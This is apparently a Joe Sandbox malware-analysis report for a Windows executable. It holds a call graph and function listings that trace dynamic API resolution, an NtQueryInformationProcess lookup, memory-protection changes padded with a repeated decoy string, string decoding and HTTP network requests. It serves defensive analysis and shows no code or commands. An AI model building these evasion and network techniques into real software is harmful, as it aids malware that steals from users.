GetProcAddress GetProcAddress 38713->38716 38714->38713 38717 191590 38715->38717 38716->38715 38987 1916b0 38717->38987 38720 1aaab0 lstrcpy 38721 1915b5 38720->38721 38722 1aaab0 lstrcpy 38721->38722 38723 1915c7 38722->38723 38724 1aaab0 lstrcpy 38723->38724 38725 1915d9 38724->38725 38726 1aaab0 lstrcpy 38725->38726 38727 191663 38726->38727 38728 1a5760 38727->38728 38729 1a5771 38728->38729 38730 1aab30 2 API calls 38729->38730 38731 1a577e 38730->38731 38732 1aab30 2 API calls 38731->38732 38733 1a578b 38732->38733 38734 1aab30 2 API calls 38733->38734 38735 1a5798 38734->38735 38736 1aaa50 lstrcpy 38735->38736 38737 1a57a5 38736->38737 38738 1aaa50 lstrcpy 38737->38738 38739 1a57b2 38738->38739 38740 1aaa50 lstrcpy 38739->38740 38741 1a57bf 38740->38741 38742 1aaa50 lstrcpy 38741->38742 38782 1a57cc 38742->38782 38743 1a5510 25 API calls 38743->38782 38744 1a5440 20 API calls 38744->38782 38745 1a5893 StrCmpCA 38745->38782 38746 1a58f0 StrCmpCA 38747 1a5a2c 38746->38747 38746->38782 38748 1aabb0 lstrcpy 38747->38748 38749 1a5a38 38748->38749 38750 1aab30 2 API calls 38749->38750 38753 1a5a46 38750->38753 38751 1aaa50 lstrcpy 38751->38782 38752 1aab30 lstrlen lstrcpy 38752->38782 38755 1aab30 2 API calls 38753->38755 38754 1a5aa6 StrCmpCA 38756 1a5be1 38754->38756 38754->38782 38759 1a5a55 38755->38759 38758 1aabb0 lstrcpy 38756->38758 38757 1aabb0 lstrcpy 38757->38782 38760 1a5bed 38758->38760 38761 1916b0 lstrcpy 38759->38761 38762 1aab30 2 API calls 38760->38762 38779 1a5a61 38761->38779 38763 1a5bfb 38762->38763 38765 1aab30 2 API calls 38763->38765 38764 1a5c5b StrCmpCA 38766 1a5c78 38764->38766 38767 1a5c66 Sleep 38764->38767 38768 1a5c0a 38765->38768 38769 1aabb0 lstrcpy 38766->38769 38767->38782 38770 1916b0 lstrcpy 38768->38770 38771 1a5c84 38769->38771 38770->38779 38773 1aab30 2 API calls 38771->38773 38772 191590 lstrcpy 38772->38782 38774 1a5c93 38773->38774 38775 1aab30 2 API calls 38774->38775 38776 1a5ca2 38775->38776 38778 1916b0 lstrcpy 38776->38778 38777 1a59da StrCmpCA 38777->38782 38778->38779 38779->37835 38780 1a5b8f StrCmpCA 38780->38782 38781 1aaab0 lstrcpy 38781->38782 38782->38743 38782->38744 38782->38745 38782->38746 38782->38751 38782->38752 38782->38754 38782->38757 38782->38764 38782->38772 38782->38777 38782->38780 38782->38781 38784 1a76dc 38783->38784 38785 1a76e3 GetVolumeInformationA 38783->38785 38784->38785 38786 1a7721 38785->38786 38787 1a778c GetProcessHeap RtlAllocateHeap 38786->38787 38788 1a77b8 wsprintfA 38787->38788 38789 1a77a9 38787->38789 38791 1aaa50 lstrcpy 38788->38791 38790 1aaa50 lstrcpy 38789->38790 38792 1a5ff7 38790->38792 38791->38792 38792->37856 38794 1aaab0 lstrcpy 38793->38794 38795 1948e9 38794->38795 38996 194800 38795->38996 38797 1948f5 38798 1aaa50 lstrcpy 38797->38798 38799 194927 38798->38799 38800 1aaa50 lstrcpy 38799->38800 38801 194934 38800->38801 38802 1aaa50 lstrcpy 38801->38802 38803 194941 38802->38803 38804 1aaa50 lstrcpy 38803->38804 38805 19494e 38804->38805 38806 1aaa50 lstrcpy 38805->38806 38807 19495b InternetOpenA StrCmpCA 38806->38807 38808 194994 38807->38808 38809 194f1b InternetCloseHandle 38808->38809 39002 1a8cf0 38808->39002 38810 194f38 38809->38810 39017 19a210 CryptStringToBinaryA 38810->39017 38812 1949b3 39010 1aac30 38812->39010 38815 1949c6 38817 1aabb0 lstrcpy 38815->38817 38822 1949cf 38817->38822 38818 1aab30 2 API calls 38819 194f55 38818->38819 38821 1aacc0 4 API calls 38819->38821 38820 194f77 codecvt 38824 1aaab0 lstrcpy 38820->38824 38823 194f6b 38821->38823 38826 1aacc0 4 API calls 38822->38826 38825 1aabb0 lstrcpy 38823->38825 38837 194fa7 38824->38837 38825->38820 38827 1949f9 38826->38827 38828 1aabb0 lstrcpy 38827->38828 38829 194a02 38828->38829 38830 1aacc0 4 API calls 38829->38830 38831 194a21 38830->38831 38832 1aabb0 lstrcpy 38831->38832 38833 194a2a 38832->38833 38834 1aac30 3 API calls 38833->38834 38835 194a48 38834->38835 38836 1aabb0 lstrcpy 38835->38836 38838 194a51 38836->38838 38837->37859 38839 1aacc0 4 API calls 38838->38839 38840 194a70 38839->38840 38841 1aabb0 lstrcpy 38840->38841 38842 194a79 38841->38842 38843 1aacc0 4 API calls 38842->38843 38844 194a98 38843->38844 38845 1aabb0 lstrcpy 38844->38845 38846 194aa1 38845->38846 38847 1aacc0 4 API calls 38846->38847 38848 194acd 38847->38848 38849 1aac30 3 API calls 38848->38849 38850 194ad4 38849->38850 38851 1aabb0 lstrcpy 38850->38851 38852 194add 38851->38852 38853 194af3 InternetConnectA 38852->38853 38853->38809 38854 194b23 HttpOpenRequestA 38853->38854 38856 194b78 38854->38856 38857 194f0e InternetCloseHandle 38854->38857 38858 1aacc0 4 API calls 38856->38858 38857->38809 38859 194b8c 38858->38859 38860 1aabb0 lstrcpy 38859->38860 38861 194b95 38860->38861 38862 1aac30 3 API calls 38861->38862 38863 194bb3 38862->38863 38864 1aabb0 lstrcpy 38863->38864 38865 194bbc 38864->38865 38866 1aacc0 4 API calls 38865->38866 38867 194bdb 38866->38867 38868 1aabb0 lstrcpy 38867->38868 38869 194be4 38868->38869 38870 1aacc0 4 API calls 38869->38870 38871 194c05 38870->38871 38872 1aabb0 lstrcpy 38871->38872 38873 194c0e 38872->38873 38874 1aacc0 4 API calls 38873->38874 38875 194c2e 38874->38875 38876 1aabb0 lstrcpy 38875->38876 38877 194c37 38876->38877 38878 1aacc0 4 API calls 38877->38878 38879 194c56 38878->38879 38880 1aabb0 lstrcpy 38879->38880 38881 194c5f 38880->38881 38882 1aac30 3 API calls 38881->38882 38883 194c7d 38882->38883 38884 1aabb0 lstrcpy 38883->38884 38885 194c86 38884->38885 38886 1aacc0 4 API calls 38885->38886 38887 194ca5 38886->38887 38888 1aabb0 lstrcpy 38887->38888 38889 194cae 38888->38889 38890 1aacc0 4 API calls 38889->38890 38891 194ccd 38890->38891 38892 1aabb0 lstrcpy 38891->38892 38893 194cd6 38892->38893 38894 1aac30 3 API calls 38893->38894 38895 194cf4 38894->38895 38896 1aabb0 lstrcpy 38895->38896 38897 194cfd 38896->38897 38898 1aacc0 4 API calls 38897->38898 38899 194d1c 38898->38899 38900 1aabb0 lstrcpy 38899->38900 38901 194d25 38900->38901 38902 1aacc0 4 API calls 38901->38902 38903 194d46 38902->38903 38904 1aabb0 lstrcpy 38903->38904 38905 194d4f 38904->38905 38906 1aacc0 4 API calls 38905->38906 38907 194d6f 38906->38907 38908 1aabb0 lstrcpy 38907->38908 38909 194d78 38908->38909 38910 1aacc0 4 API calls 38909->38910 38911 194d97 38910->38911 38912 1aabb0 lstrcpy 38911->38912 38913 194da0 38912->38913 38914 1aac30 3 API calls 38913->38914 38915 194dbe 38914->38915 38916 1aabb0 lstrcpy 38915->38916 38917 194dc7 38916->38917 38918 1aaa50 lstrcpy 38917->38918 38919 194de2 38918->38919 38920 1aac30 3 API calls 38919->38920 38921 194e03 38920->38921 38922 1aac30 3 API calls 38921->38922 38923 194e0a 38922->38923 38924 1aabb0 lstrcpy 38923->38924 38925 194e16 38924->38925 38926 194e37 lstrlen 38925->38926 38927 194e4a 38926->38927 38928 194e53 lstrlen 38927->38928 39016 1aade0 38928->39016 38930 194e63 HttpSendRequestA 38931 194e82 InternetReadFile 38930->38931 38932 194eb7 InternetCloseHandle 38931->38932 38937 194eae 38931->38937 38935 1aab10 38932->38935 38934 1aacc0 4 API calls 38934->38937 38935->38857 38936 1aabb0 lstrcpy 38936->38937 38937->38931 38937->38932 38937->38934 38937->38936 39023 1aade0 38938->39023 38940 1a1a14 StrCmpCA 38941 1a1a1f ExitProcess 38940->38941 38943 1a1a27 38940->38943 38942 1a1c12 38942->37861 38943->38942 38944 1a1b1f StrCmpCA 38943->38944 38945 1a1afd StrCmpCA 38943->38945 38946 1a1acf StrCmpCA 38943->38946 38947 1a1aad StrCmpCA 38943->38947 38948 1a1b82 StrCmpCA 38943->38948 38949 1a1b63 StrCmpCA 38943->38949 38950 1a1bc0 StrCmpCA 38943->38950 38951 1a1b41 StrCmpCA 38943->38951 38952 1a1ba1 StrCmpCA 38943->38952 38953 1aab30 lstrlen lstrcpy 38943->38953 38944->38943 38945->38943 38946->38943 38947->38943 38948->38943 38949->38943 38950->38943 38951->38943 38952->38943 38953->38943 38954->37867 38955->37869 38956->37875 38957->37877 38958->37883 38959->37885 38960->37889 38961->37893 38962->37897 38963->37903 38964->37905 38965->37909 38966->37923 38967->37927 38968->37926 38969->37922 38970->37926 38971->37941 38972->37930 38973->37932 38974->37935 38975->37938 38976->37943 38977->37950 38978->37953 38979->37959 38980->37980 38981->37984 38982->37983 38983->37979 38984->37983 38985->37994 38988 1aaab0 lstrcpy 38987->38988 38989 1916c3 38988->38989 38990 1aaab0 lstrcpy 38989->38990 38991 1916d5 38990->38991 38992 1aaab0 lstrcpy 38991->38992 38993 1916e7 38992->38993 38994 1aaab0 lstrcpy 38993->38994 38995 1915a3 38994->38995 38995->38720 38997 194816 38996->38997 38998 194888 lstrlen 38997->38998 39022 1aade0 38998->39022 39000 194898 InternetCrackUrlA 39001 1948b7 39000->39001 39001->38797 39003 1aaa50 lstrcpy 39002->39003 39004 1a8d04 39003->39004 39005 1aaa50 lstrcpy 39004->39005 39006 1a8d12 GetSystemTime 39005->39006 39008 1a8d29 39006->39008 39007 1aaab0 lstrcpy 39009 1a8d8c 39007->39009 39008->39007 39009->38812 39011 1aac41 39010->39011 39012 1aac98 39011->39012 39014 1aac78 lstrcpy lstrcat 39011->39014 39013 1aaab0 lstrcpy 39012->39013 39015 1aaca4 39013->39015 39014->39012 39015->38815 39016->38930 39018 19a249 LocalAlloc 39017->39018 39019 194f3e 39017->39019 39018->39019 39020 19a264 CryptStringToBinaryA 39018->39020 39019->38818 39019->38820 39020->39019 39021 19a289 LocalFree 39020->39021 39021->39019 39022->39000 39023->38940

                                    Executed Functions

                                    Function 001A9BB0 Relevance: 70.2, APIs: 33, Strings: 7, Instructions: 212libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 1a9bb0-1a9bc4 call 1a9aa0 663 1a9bca-1a9dde call 1a9ad0 GetProcAddress * 21 660->663 664 1a9de3-1a9e42 LoadLibraryA * 5 660->664 663->664 666 1a9e5d-1a9e64 664->666 667 1a9e44-1a9e58 GetProcAddress 664->667 669 1a9e96-1a9e9d 666->669 670 1a9e66-1a9e91 GetProcAddress * 2 666->670 667->666 671 1a9eb8-1a9ebf 669->671 672 1a9e9f-1a9eb3 GetProcAddress 669->672 670->669 673 1a9ed9-1a9ee0 671->673 674 1a9ec1-1a9ed4 GetProcAddress 671->674 672->671 675 1a9ee2-1a9f0c GetProcAddress * 2 673->675 676 1a9f11-1a9f12 673->676 674->673 675->676
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,00E20DD0), ref: 001A9BF1
                                    • GetProcAddress.KERNEL32(75900000,00E20F50), ref: 001A9C0A
                                    • GetProcAddress.KERNEL32(75900000,00E20E00), ref: 001A9C22
                                    • GetProcAddress.KERNEL32(75900000,00E20C68), ref: 001A9C3A
                                    • GetProcAddress.KERNEL32(75900000,00E20C98), ref: 001A9C53
                                    • GetProcAddress.KERNEL32(75900000,00E29290), ref: 001A9C6B
                                    • GetProcAddress.KERNEL32(75900000,00E14F40), ref: 001A9C83
                                    • GetProcAddress.KERNEL32(75900000,00E14F60), ref: 001A9C9C
                                    • GetProcAddress.KERNEL32(75900000,00E20CC8), ref: 001A9CB4
                                    • GetProcAddress.KERNEL32(75900000,00E20CE0), ref: 001A9CCC
                                    • GetProcAddress.KERNEL32(75900000,00E20E30), ref: 001A9CE5
                                    • GetProcAddress.KERNEL32(75900000,00E20E60), ref: 001A9CFD
                                    • GetProcAddress.KERNEL32(75900000,00E15120), ref: 001A9D15
                                    • GetProcAddress.KERNEL32(75900000,00E20E48), ref: 001A9D2E
                                    • GetProcAddress.KERNEL32(75900000,00E20E90), ref: 001A9D46
                                    • GetProcAddress.KERNEL32(75900000,00E15140), ref: 001A9D5E
                                    • GetProcAddress.KERNEL32(75900000,00E20EC0), ref: 001A9D77
                                    • GetProcAddress.KERNEL32(75900000,00E20FF8), ref: 001A9D8F
                                    • GetProcAddress.KERNEL32(75900000,00E150E0), ref: 001A9DA7
                                    • GetProcAddress.KERNEL32(75900000,00E20F80), ref: 001A9DC0
                                    • GetProcAddress.KERNEL32(75900000,00E15160), ref: 001A9DD8
                                    • LoadLibraryA.KERNEL32(00E20F98,?,001A6CA0), ref: 001A9DEA
                                    • LoadLibraryA.KERNEL32(00E20FC8,?,001A6CA0), ref: 001A9DFB
                                    • LoadLibraryA.KERNEL32(00E20FB0,?,001A6CA0), ref: 001A9E0D
                                    • LoadLibraryA.KERNEL32(00E20FE0,?,001A6CA0), ref: 001A9E1F
                                    • LoadLibraryA.KERNEL32(00E21028,?,001A6CA0), ref: 001A9E30
                                    • GetProcAddress.KERNEL32(75070000,00E21010), ref: 001A9E52
                                    • GetProcAddress.KERNEL32(75FD0000,00E20F68), ref: 001A9E73
                                    • GetProcAddress.KERNEL32(75FD0000,00E29668), ref: 001A9E8B
                                    • GetProcAddress.KERNEL32(75A50000,00E29698), ref: 001A9EAD
                                    • GetProcAddress.KERNEL32(74E50000,00E14FC0), ref: 001A9ECE
                                    • GetProcAddress.KERNEL32(76E80000,00E29120), ref: 001A9EEF
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 001A9F06
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: Q$@O$@Q$NtQueryInformationProcess$`O$`Q$P
                                    • API String ID: 2238633743-3470254300
                                    • Opcode ID: ff012cd1c1cc8d122a22cb1c640e8a530f1e81931da1c917b7c410148315ce20
                                    • Instruction ID: 2b26d79ad920807f2542aff67531456fe2375de1c5d785d5c074710e0d6bf7c2
                                    • Opcode Fuzzy Hash: ff012cd1c1cc8d122a22cb1c640e8a530f1e81931da1c917b7c410148315ce20
                                    • Instruction Fuzzy Hash: 52A14FB5518201DFC344DFA8EC989967BA9A74E709710867BF909C3370FBB49940CF6A
                                    Function 00194610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 764 194610-1946e5 RtlAllocateHeap 781 1946f0-1946f6 764->781 782 1946fc-19479a 781->782 783 19479f-1947f9 VirtualProtect 781->783 782->781
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0019465F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001947EC
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0019467D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194784
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0019462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001946C8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194667
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194688
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001946A7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194763
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194728
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194779
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194707
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001947AA
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194672
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194693
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001946D3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001947B5
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0019476E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0019479F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001947C0
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001946B2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0019478F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001947CB
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194712
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0019471D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001946BD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001946FC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00194617
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: 0c86065848020d2f375b1cee2cb2e25bf7069e4e33e9c853b009f69b25ea5755
                                    • Instruction ID: 01ad97414d9b14cb3520f285dc21da7bcb5f3f203655873d9096e3a248cd8151
                                    • Opcode Fuzzy Hash: 0c86065848020d2f375b1cee2cb2e25bf7069e4e33e9c853b009f69b25ea5755
                                    • Instruction Fuzzy Hash: 9441F4607E26146EEF7AFBA6886AFFD766BDF43708F409044EC2052285CBF46508C5B5
                                    Function 001962D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1033 1962d0-19635b call 1aaab0 call 194800 call 1aaa50 InternetOpenA StrCmpCA 1040 19635d 1033->1040 1041 196364-196368 1033->1041 1040->1041 1042 196559-196575 call 1aaab0 call 1aab10 * 2 1041->1042 1043 19636e-196392 InternetConnectA 1041->1043 1062 196578-19657d 1042->1062 1045 196398-19639c 1043->1045 1046 19654f-196553 InternetCloseHandle 1043->1046 1048 1963aa 1045->1048 1049 19639e-1963a8 1045->1049 1046->1042 1051 1963b4-1963e2 HttpOpenRequestA 1048->1051 1049->1051 1053 1963e8-1963ec 1051->1053 1054 196545-196549 InternetCloseHandle 1051->1054 1056 1963ee-19640f InternetSetOptionA 1053->1056 1057 196415-196455 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1046 1056->1057 1059 19647c-19649b call 1a8ad0 1057->1059 1060 196457-196477 call 1aaa50 call 1aab10 * 2 1057->1060 1067 196519-196539 call 1aaa50 call 1aab10 * 2 1059->1067 1068 19649d-1964a4 1059->1068 1060->1062 1067->1062 1071 196517-19653f InternetCloseHandle 1068->1071 1072 1964a6-1964d0 InternetReadFile 1068->1072 1071->1054 1076 1964db 1072->1076 1077 1964d2-1964d9 1072->1077 1076->1071 1077->1076 1080 1964dd-196515 call 1aacc0 call 1aabb0 call 1aab10 1077->1080 1080->1072
                                    APIs
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 00194800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00194889
                                      • Part of subcall function 00194800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00194899
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
